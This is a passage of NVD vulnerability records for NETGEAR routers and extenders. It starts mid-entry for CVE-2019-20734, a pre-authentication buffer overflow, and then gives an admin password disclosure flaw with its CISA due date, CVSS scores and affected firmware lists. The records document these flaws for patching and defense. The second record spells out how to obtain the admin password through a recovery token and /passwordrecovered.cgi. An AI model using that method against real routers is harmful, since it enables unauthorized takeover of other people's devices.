"criteria": "cpe:2.3:o:netgear:ex6100_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "746ADED9-4517-4482-AAEF-ACD301B433F8",
"versionEndExcluding": "1.0.2.22",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:ex6100:-:*:*:*:*:*:*:*",
"matchCriteriaId": "AB84CD03-765C-4D4F-A176-364F8E72A4E7",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:ex6120_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "12C1BB59-1A89-45B9-A1D2-6D8DFEEC2F16",
"versionEndExcluding": "1.0.0.40",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:ex6120:-:*:*:*:*:*:*:*",
"matchCriteriaId": "8C6DFDB6-1D7A-459A-8D30-FD4900ED718B",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:ex6130_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "09C02A78-A382-43A0-A20F-D6521F6DD57F",
"versionEndExcluding": "1.0.0.22",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:ex6130:-:*:*:*:*:*:*:*",
"matchCriteriaId": "305E295C-9C73-4798-A0BE-7973E1EE5EAB",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:ex6150_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "D74896A7-7EF2-41C9-8A29-59B2EA5ABA5C",
"versionEndExcluding": "1.0.0.42",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:ex6150:v1:*:*:*:*:*:*:*",
"matchCriteriaId": "2CB9BD19-E748-41B9-8873-316FEB83F13D",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:ex6200_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "A81A7574-A2C7-4216-98C6-6790FA705013",
"versionEndExcluding": "1.0.3.88",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:ex6200:-:*:*:*:*:*:*:*",
"matchCriteriaId": "3186CC67-B567-4A0C-BD2C-0433716FBD1B",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:ex7000_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "2F1E93FB-4926-4AF5-BA5F-A4DE4314B45F",
"versionEndExcluding": "1.0.0.66",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:ex7000:-:*:*:*:*:*:*:*",
"matchCriteriaId": "9F45B620-60B8-40F3-A055-181ADD71EFFF",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:r6300_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "55058831-92FF-4A87-8340-E25AC0DDF89E",
"versionEndExcluding": "1.0.4.18",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:r6300:v2:*:*:*:*:*:*:*",
"matchCriteriaId": "10938043-F7DF-42C3-8C16-F92CAF8E5576",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:r6400_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "29EA60BF-FBA6-4305-8173-07130A527410",
"versionEndExcluding": "1.0.1.24",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:r6400:-:*:*:*:*:*:*:*",
"matchCriteriaId": "3E4CDF6B-3829-44D0-9675-71D7BE83CAA2",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:r6400_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "DB7B08B9-07D2-4404-846A-D1CA02C16557",
"versionEndExcluding": "1.0.2.32",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:r6400:v2:*:*:*:*:*:*:*",
"matchCriteriaId": "52AE9AD2-BC8D-477D-A3D3-891AE52FA5F3",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:r6700_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "3C3255EE-BBE5-4EBE-92CC-D0C6E6D8563F",
"versionEndExcluding": "1.0.1.22",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:r6700:-:*:*:*:*:*:*:*",
"matchCriteriaId": "21B27F11-4262-4CE1-8107-B365A7C152F2",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:r6700_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "A080293F-248B-4A42-8EF3-C890AEDE2462",
"versionEndExcluding": "1.0.2.32",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:r6700:v3:*:*:*:*:*:*:*",
"matchCriteriaId": "5A09A9E8-8C77-4EDB-9483-B3C540EF083A",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:r6900_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "24E4CE14-4FC5-4F73-BFC8-F0B0D924F788",
"versionEndExcluding": "1.0.1.22",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:r6900:-:*:*:*:*:*:*:*",
"matchCriteriaId": "0794BB7C-1BCF-4F08-8EB2-9C3B150C105A",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:r7000_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "819CC65F-F5DA-4620-BC68-CAAA2B73195D",
"versionEndExcluding": "1.0.9.6",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:r7000:-:*:*:*:*:*:*:*",
"matchCriteriaId": "C9F86FF6-AB32-4E51-856A-DDE790C0A9A6",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:r6900p_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "2E9EF43B-2542-44CE-A1D6-DECCCFBC1F5F",
"versionEndExcluding": "1.0.0.56",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:r6900p:-:*:*:*:*:*:*:*",
"matchCriteriaId": "C41908FF-AE64-4949-80E3-BEE061B2DA8A",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:r7000p_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "ADFE7176-BD34-467C-A167-E869E04A8E97",
"versionEndExcluding": "1.0.0.56",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:r7000p:-:*:*:*:*:*:*:*",
"matchCriteriaId": "DFE55F4D-E98B-46D3-B870-041141934CD1",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:r7100lg_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "B3D808FE-AA8D-40DF-B838-4853EB8911E7",
"versionEndExcluding": "1.0.0.42",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:r7100lg:-:*:*:*:*:*:*:*",
"matchCriteriaId": "366FA778-3C2A-42AF-9141-DAD7043B406C",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:r7300dst_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "F0EE8EBA-C4CD-4CA1-A684-54338B1254A9",
"versionEndExcluding": "1.0.0.54",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:r7300dst:-:*:*:*:*:*:*:*",
"matchCriteriaId": "C75148EB-DE6C-4C5C-BF34-4800A66CF11C",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:r7900_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "0B72579C-51F1-4F16-8FDE-544229C25B07",
"versionEndExcluding": "1.0.1.26",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:r7900:-:*:*:*:*:*:*:*",
"matchCriteriaId": "C484840F-AF30-4B5C-821A-4DB9BE407BDB",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:r8300_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "BCE9CF95-192E-4D43-9DAD-2C8D9AF045E9",
"versionEndExcluding": "1.0.2.106",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:r8300:-:*:*:*:*:*:*:*",
"matchCriteriaId": "7A9B77E7-7439-48C6-989F-5E22CB4D3044",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:r8500_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "4DFD7557-D13D-40EB-94AD-AF092CDE587A",
"versionEndExcluding": "1.0.2.106",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:r8500:-:*:*:*:*:*:*:*",
"matchCriteriaId": "63500DE4-BDBD-4F86-AB99-7DB084D0B912",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:wn2500rp_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "0675F6C4-EB61-4DA3-8473-448E93D5E0A5",
"versionEndExcluding": "1.0.1.54",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:wn2500rp:v2:*:*:*:*:*:*:*",
"matchCriteriaId": "1C4C1B98-9551-4862-AEAC-3D5C313BD275",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:wnr3500l_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "DB542F95-5AE2-47E4-BD7B-34134B26AA4F",
"versionEndExcluding": "1.2.0.46",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:wnr3500l:v2:*:*:*:*:*:*:*",
"matchCriteriaId": "C8DE4BFA-41DE-4748-ACC7-14362333A059",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
}
],
"cveTags": [],
"descriptions": [
{
"lang": "en",
"value": "Certain NETGEAR devices are affected by a buffer overflow by an unauthenticated attacker. This affects D6220 before 1.0.0.40, D8500 before 1.0.3.39, EX3700 before 1.0.0.70, EX3800 before 1.0.0.70, EX6000 before 1.0.0.30, EX6100 before 1.0.2.22, EX6120 before 1.0.0.40, EX6130 before 1.0.0.22, EX6150v1 before 1.0.0.42, EX6200 before 1.0.3.88, EX7000 before 1.0.0.66, R6300v2 before 1.0.4.18, R6400 before 1.0.1.24, R6400v2 before 1.0.2.32, R6700 before 1.0.1.22, R6700v3 before 1.0.2.32, R6900 before 1.0.1.22, R7000 before 1.0.9.6, R6900P before 1.0.0.56, R7000P before 1.0.0.56, R7100LG before 1.0.0.42, R7300DST before 1.0.0.54, R7900 before 1.0.1.26, R8300 before 1.0.2.106, R8500 before 1.0.2.106, WN2500RPv2 before 1.0.1.54, and WNR3500Lv2 before 1.2.0.46. NOTE: this may be a result of an incomplete fix for CVE-2017-18864."
},
{
"lang": "es",
"value": "Ciertos dispositivos NETGEAR se ven afectados por un desbordamiento del b\u00fafer por parte de un atacante no autenticado. Esto afecta a D6220 antes de 1.0.0.40, D8500 antes de 1.0.3.39, EX3700 antes de 1.0.0.70, EX3800 antes de 1.0.0.70, EX6000 antes de 1.0.0.30, EX6100 antes de 1.0.2.22, EX6120 antes de 1.0.0.40, EX6130 antes de 1.0.0.22, EX6150v1 antes 1.0.0.42, EX6200 antes 1.0.3.88, EX7000 antes 1.0.0.66, R6300v2 antes 1.0.4.18, R6400 antes 1.0.1.24, R6400v2 antes 1.0.2.32, R6700 antes 1.0.1.22, R6700v3 antes 1.0.2.32, R6900 antes 1.0.1.22, R7000 antes de 1.0.9.6, R6900P antes de 1.0.0.56, R7000P antes de 1.0.0.56, R7100LG antes de 1.0.0.42, R7300DST antes de 1.0.0.54, R7900 antes de 1.0.1.26, R8300 antes de 1.0.2.106, R8500 antes de 1.0. 2.106, WN2500RPv2 antes de 1.0.1.54 y WNR3500Lv2 antes de 1.2.0.46. NOTA: esto puede ser el resultado de una soluci\u00f3n incompleta para CVE-2017-18864."
}
],
"id": "CVE-2019-20734",
"lastModified": "2024-11-21T04:39:13.173",
"metrics": {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "MEDIUM",
"cvssData": {
"accessComplexity": "LOW",
"accessVector": "ADJACENT_NETWORK",
"authentication": "NONE",
"availabilityImpact": "PARTIAL",
"baseScore": 5.8,
"confidentialityImpact": "PARTIAL",
"integrityImpact": "PARTIAL",
"vectorString": "AV:A/AC:L/Au:N/C:P/I:P/A:P",
"version": "2.0"
},
"exploitabilityScore": 6.5,
"impactScore": 6.4,
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"source": "nvd@nist.gov",
"type": "Primary",
"userInteractionRequired": false
}
],
"cvssMetricV30": [
{
"cvssData": {
"attackComplexity": "HIGH",
"attackVector": "ADJACENT_NETWORK",
"availabilityImpact": "LOW",
"baseScore": 8.2,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "CHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.0/AV:A/AC:H/PR:N/UI:N/S:C/C:H/I:H/A:L",
"version": "3.0"
},
"exploitabilityScore": 1.6,
"impactScore": 6.0,
"source": "cve@mitre.org",
"type": "Secondary"
}
],
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "ADJACENT_NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 8.8,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:A/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"exploitabilityScore": 2.8,
"impactScore": 5.9,
"source": "nvd@nist.gov",
"type": "Primary"
}
]
},
"published": "2020-04-16T20:15:13.553",
"references": [
{
"source": "cve@mitre.org",
"tags": [
"Vendor Advisory"
],
"url": "https://kb.netgear.com/000061192/Security-Advisory-for-Pre-Authentication-Buffer-Overflow-on-Some-Routers-Gateways-and-Extenders-PSV-2017-0791"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Vendor Advisory"
],
"url": "https://kb.netgear.com/000061192/Security-Advisory-for-Pre-Authentication-Buffer-Overflow-on-Some-Routers-Gateways-and-Extenders-PSV-2017-0791"
}
],
"sourceIdentifier": "cve@mitre.org",
"vulnStatus": "Modified",
"weaknesses": [
{
"description": [
{
"lang": "en",
"value": "CWE-120"
}
],
"source": "nvd@nist.gov",
"type": "Primary"
}
]
}
Vulnerability from fkie_nvd
Published
2017-01-17 09:59
Modified
2025-02-04 21:15
Severity ?
8.1 (High) - CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H
8.1 (High) - CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H
8.1 (High) - CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H
Summary
An issue was discovered on NETGEAR R8500, R8300, R7000, R6400, R7300, R7100LG, R6300v2, WNDR3400v3, WNR3500Lv2, R6250, R6700, R6900, and R8000 devices. They are prone to password disclosure via simple crafted requests to the web management server. The bug is exploitable remotely if the remote management option is set, and can also be exploited given access to the router over LAN or WLAN. When trying to access the web panel, a user is asked to authenticate; if the authentication is canceled and password recovery is not enabled, the user is redirected to a page that exposes a password recovery token. If a user supplies the correct token to the page /passwordrecovered.cgi?id=TOKEN (and password recovery is not enabled), they will receive the admin password for the router. If password recovery is set the exploit will fail, as it will ask the user for the recovery questions that were previously set when enabling that feature. This is persistent (even after disabling the recovery option, the exploit will fail) because the router will ask for the security questions.
References
| ▼ | URL | Tags | |
|---|---|---|---|
| cve@mitre.org | http://kb.netgear.com/30632/Web-GUI-Password-Recovery-and-Exposure-Security-Vulnerability | Vendor Advisory | |
| cve@mitre.org | http://www.securityfocus.com/bid/95457 | Broken Link, Third Party Advisory, VDB Entry | |
| cve@mitre.org | https://www.exploit-db.com/exploits/41205/ | Exploit, Third Party Advisory, VDB Entry | |
| af854a3a-2127-422b-91ae-364da2661108 | http://kb.netgear.com/30632/Web-GUI-Password-Recovery-and-Exposure-Security-Vulnerability | Vendor Advisory | |
| af854a3a-2127-422b-91ae-364da2661108 | http://www.securityfocus.com/bid/95457 | Broken Link, Third Party Advisory, VDB Entry | |
| af854a3a-2127-422b-91ae-364da2661108 | https://www.exploit-db.com/exploits/41205/ | Exploit, Third Party Advisory, VDB Entry |
Impacted products
| Vendor | Product | Version | |
|---|---|---|---|
| netgear | r6200_firmware | 1.0.1.56_1.0.43 | |
| netgear | r6200 | - | |
| netgear | r6300_firmware | 1.0.2.78_1.0.58 | |
| netgear | r6300 | - | |
| netgear | vegn2610_firmware | 1.0.0.36 | |
| netgear | vegn2610 | - | |
| netgear | ac1450_firmware | 1.0.0.34_10.0.16 | |
| netgear | ac1450 | - | |
| netgear | wnr1000v3_firmware | 1.0.2.68_60.0.93 | |
| netgear | wnr1000v3 | - | |
| netgear | wndr3700v3_firmware | 1.0.0.40_1.0.32 | |
| netgear | wndr3700v3 | - | |
| netgear | wndr4000_firmware | 1.0.2.4_9.1.86 | |
| netgear | wndr4000 | - | |
| netgear | wndr4500_firmware | 1.0.1.44_1.0.73 | |
| netgear | wndr4500 | - | |
| netgear | d6400_firmware | 1.0.0.44 | |
| netgear | d6400 | - | |
| netgear | d6220_firmware | 1.0.0.12 | |
| netgear | d6220 | - | |
| netgear | d6300_firmware | 1.0.0.96 | |
| netgear | d6300 | - | |
| netgear | d6300b_firmware | 1.0.0.40 | |
| netgear | d6300b | - | |
| netgear | dgn2200bv4_firmware | 1.0.0.68 | |
| netgear | dgn2200bv4 | - |
{
"cisaActionDue": "2022-09-29",
"cisaExploitAdd": "2022-09-08",
"cisaRequiredAction": "Apply updates per vendor instructions. If the affected device has since entered end-of-life, it should be disconnected if still in use.",
"cisaVulnerabilityName": "NETGEAR Multiple Devices Exposure of Sensitive Information Vulnerability",
"configurations": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:r6200_firmware:1.0.1.56_1.0.43:*:*:*:*:*:*:*",
"matchCriteriaId": "1C1769F8-B2CB-465B-85B8-9D7AC25C63CB",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:r6200:-:*:*:*:*:*:*:*",
"matchCriteriaId": "8A466B29-3ADA-46D9-824C-8DF9160B7DD7",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:r6300_firmware:1.0.2.78_1.0.58:*:*:*:*:*:*:*",
"matchCriteriaId": "89A99D1C-CABE-4526-B3B7-3708C0E18AC4",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:r6300:-:*:*:*:*:*:*:*",
"matchCriteriaId": "9597966A-B13C-4098-838B-EC9AA8DE443D",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:vegn2610_firmware:1.0.0.36:*:*:*:*:*:*:*",
"matchCriteriaId": "6D329D85-C180-426E-B430-9FEDE5C77F25",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:vegn2610:-:*:*:*:*:*:*:*",
"matchCriteriaId": "0967FC76-F977-4D18-B570-9444459A19FE",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:ac1450_firmware:1.0.0.34_10.0.16:*:*:*:*:*:*:*",
"matchCriteriaId": "91292776-92F7-4089-86FC-7569C8F940DE",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:ac1450:-:*:*:*:*:*:*:*",
"matchCriteriaId": "E4BA18B2-8234-4C26-B865-741D467C5EBE",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:wnr1000v3_firmware:1.0.2.68_60.0.93:*:*:*:*:*:*:*",
"matchCriteriaId": "4E35A89F-44C7-496C-B61B-652989EDE438",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:wnr1000v3:-:*:*:*:*:*:*:*",
"matchCriteriaId": "252E5C7B-EF02-4374-A43E-02FAA9E697D0",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:wndr3700v3_firmware:1.0.0.40_1.0.32:*:*:*:*:*:*:*",
"matchCriteriaId": "1D59A6F9-0359-4AB4-AD0F-1D6044D59409",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:wndr3700v3:-:*:*:*:*:*:*:*",
"matchCriteriaId": "603836E6-E7FF-43C7-A410-8BD9D0950F7C",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:wndr4000_firmware:1.0.2.4_9.1.86:*:*:*:*:*:*:*",
"matchCriteriaId": "91561A20-30F5-4163-9178-5FC32897F827",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:wndr4000:-:*:*:*:*:*:*:*",
"matchCriteriaId": "1C34EC74-D6F1-46F1-B47E-E62793171427",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:wndr4500_firmware:1.0.1.44_1.0.73:*:*:*:*:*:*:*",
"matchCriteriaId": "B9874914-4D90-493F-BD2B-40FFF1737F58",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:wndr4500:-:*:*:*:*:*:*:*",
"matchCriteriaId": "7E9F459C-B628-402A-AF4A-72E08FE41837",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:d6400_firmware:1.0.0.44:*:*:*:*:*:*:*",
"matchCriteriaId": "D3EB5F49-3628-4418-AF36-AF8FD6F5BA25",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:d6400:-:*:*:*:*:*:*:*",
"matchCriteriaId": "7D30939B-86E3-4C78-9B05-686B4994C8B9",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:d6220_firmware:1.0.0.12:*:*:*:*:*:*:*",
"matchCriteriaId": "ECD46588-5866-4159-85E1-58B0D1F98406",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:d6220:-:*:*:*:*:*:*:*",
"matchCriteriaId": "F3EEA190-2E9C-4586-BF81-B115532FBA23",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:d6300_firmware:1.0.0.96:*:*:*:*:*:*:*",
"matchCriteriaId": "7B15B85C-F099-4584-9F59-1CFC3275D625",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:d6300:-:*:*:*:*:*:*:*",
"matchCriteriaId": "78542C95-85CC-43E5-9F0E-B12DDD5B79C4",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:d6300b_firmware:1.0.0.40:*:*:*:*:*:*:*",
"matchCriteriaId": "D0CE8A8F-7894-4140-8E4B-84153C5A6B13",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:d6300b:-:*:*:*:*:*:*:*",
"matchCriteriaId": "37B89703-CAFB-43F6-8880-90349F8ED856",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:dgn2200bv4_firmware:1.0.0.68:*:*:*:*:*:*:*",
"matchCriteriaId": "E1CDFE4F-6C5C-4B10-926E-92C7759D60EF",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:dgn2200bv4:-:*:*:*:*:*:*:*",
"matchCriteriaId": "9C78A475-9DDF-432B-A94A-01EFAC7DC70D",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
}
],
"cveTags": [],
"descriptions": [
{
"lang": "en",
"value": "An issue was discovered on NETGEAR R8500, R8300, R7000, R6400, R7300, R7100LG, R6300v2, WNDR3400v3, WNR3500Lv2, R6250, R6700, R6900, and R8000 devices. They are prone to password disclosure via simple crafted requests to the web management server. The bug is exploitable remotely if the remote management option is set, and can also be exploited given access to the router over LAN or WLAN. When trying to access the web panel, a user is asked to authenticate; if the authentication is canceled and password recovery is not enabled, the user is redirected to a page that exposes a password recovery token. If a user supplies the correct token to the page /passwordrecovered.cgi?id=TOKEN (and password recovery is not enabled), they will receive the admin password for the router. If password recovery is set the exploit will fail, as it will ask the user for the recovery questions that were previously set when enabling that feature. This is persistent (even after disabling the recovery option, the exploit will fail) because the router will ask for the security questions."
},
{
"lang": "es",
